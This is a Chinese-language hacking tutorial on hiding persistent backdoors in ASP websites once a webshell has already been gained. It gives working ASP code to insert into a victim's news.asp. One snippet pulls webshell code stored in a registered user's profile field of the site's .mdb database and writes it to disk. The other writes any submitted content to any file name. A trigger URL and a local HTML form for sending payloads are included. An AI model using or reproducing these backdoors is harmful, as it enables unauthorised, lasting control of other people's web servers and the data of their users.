巧妙利用.mdb后綴數(shù)據(jù)庫(kù)做后門

字號(hào):

我不否認(rèn)n早前的那個(gè)把a(bǔ)sp木馬寫到圖片文件中不失為一種好的方法,其實(shí)不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦
    copy 文件名/參數(shù) + 文件名/參數(shù) 生成文件名
    這樣的方法可以很靈活的運(yùn)用來(lái)達(dá)到隱藏文件的目的,具體的參數(shù)就是/a以acsic碼方式,/b二進(jìn)制方式,就不羅嗦這些了,至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴.mdb的數(shù)據(jù)庫(kù)中,前提是在我們拿到
    一個(gè)webshell之后...
    我們所知道的,很多站點(diǎn)在用戶注冊(cè)的時(shí)候要讓填好多東西例如:
    用戶名、密碼、QQ、郵箱、個(gè)人簡(jiǎn)介、電話、聯(lián)系方式、住址一類的
    而對(duì)應(yīng)到數(shù)據(jù)庫(kù)中也都會(huì)有相應(yīng)的表 字段 值
    我今天要做的就是 我注冊(cè)一個(gè)用戶在 我的個(gè)人簡(jiǎn)介的地方上寫入shell代碼,然后修改他站點(diǎn)上的一個(gè)文件,使用的時(shí)候觸發(fā)這個(gè)文件,就把我個(gè)人簡(jiǎn)歷中的shell代碼,備份到當(dāng)前目錄下
    <%
    if request("action")="firefox" then
    fname=request.querystring("fn")
    tname=request.querystring("tn")
    bname=request.querystring("bn")
    id=request.querystring("id")
    idvalue=request.querystring("idv")
    set rs=server.createobject("ADODB.recordset")
    sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
    rs.open sql,conn,1,3
    if not rs.eof then
    content=rs(bname)
    else
    response.write "Nothing"
    end if
    set fso=Server.CreateObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(fname))
    txtfile.writeline(content)
    txtfile.close
    end if
    %>
    將上邊的代碼加到站點(diǎn)的一個(gè)文件中 如news.asp
    根據(jù)我們了解的信息 在其站點(diǎn)注冊(cè)后 下載數(shù)據(jù)庫(kù)看結(jié)構(gòu)
    我注冊(cè)的firefox名字是在 user表 其id值為119 用于存放我注冊(cè)簡(jiǎn)歷的表字段為jl
    那么在使用的時(shí)候我們
    news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
    就可以在news.asp相同目錄下寫入一個(gè)名為 firefox.asp的webshell
    以上可以說(shuō)是萬(wàn)千隱藏方法中的一種 下邊再說(shuō)另外一種更方便的隱藏方法
    這個(gè)方法就和mdb后綴無(wú)關(guān)系了
    同樣我們還是修改news.asp 將以下代碼插入到對(duì)方news.asp中
    <%
    if request("action")="firefox" then
    n=request.form("n")
    c=request.form("c")
    set fso=Server.CreateObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(n))
    txtfile.writeline(c)
    txtfile.close
    end if
    %><
    這段代碼相對(duì)簡(jiǎn)單些 算是一個(gè)木馬的服務(wù)端吧
    使用的時(shí)候以這段代碼配合
    
    
    F.s.t火狐技術(shù)聯(lián)盟[www.wrsky.com]
    

    
    Name:    name=n width="32">
    Shell:

    將以上代碼中的
    http://localhost/config.asp?action=firefox
    替換成你的服務(wù)端地址
    然后保存為本地的.htm文件,本地打開后定義要生成的文件名 文件內(nèi)容 遠(yuǎn)程提交 ok 又是一種留后門的方法